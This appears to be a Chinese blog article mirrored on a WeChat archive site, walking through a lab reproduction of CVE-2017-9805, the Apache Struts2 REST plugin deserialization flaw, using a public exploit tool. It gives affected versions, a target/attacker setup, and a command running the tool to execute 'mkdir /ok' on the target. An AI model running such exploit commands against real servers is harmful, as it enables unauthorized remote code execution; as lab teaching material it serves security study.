终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

CVE-2017-9805简单利用

黑白之道 2020-11-07

漏洞背景


2017年9月5日,Apache Struts 2官方发布了一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,公告称Apache Struts2的REST插件存在远程代码执行的高危漏洞, Struts2 REST插件的XStream组件存在反序列化漏洞,使用带有 XStream实例的 XStreamHandler进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。


漏洞影响范围

Struts 2.3.x全系版本(根据实际测试,2.3版本也存在该漏洞)
Struts 2.5 - Struts 2.5.12

实验环境


靶机:192.168.123.16  (centos7)
攻击机:1192.168.123.157(Kali)

CVE-2017-9805利用


下载CVE-2017-9805
git clone 

https://github.com/mazen160/struts-pwn_CVE-2017-9805


进入目录,运行struts-pwn.py在/下创建一个ok目录

cd struts-pwn_CVE-2017-9805python struts-pwn.py --exploit --url 'http://192.168.123.16:8080/orders.xhtml' -c 'mkdir /ok'


参数

-h, --help show this help message and exit-u URL, --url URL Check a single URL.-l USEDLIST, --list USEDLIST Check a list of URLs.-c CMD, --cmd CMD Command to execute. (Default: 'touch /tmp/struts-pwn')--exploit Exploit.


查看centos7的/下有没有ok目录




注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。


推荐文章++++

*CVE-2020-0787 简单利用

*CVE-2020-11651 SaltStack远程命令执行漏洞

*CVE-2020-0796 漏洞复现(rce)


    文章有问题?点此查看未经处理的缓存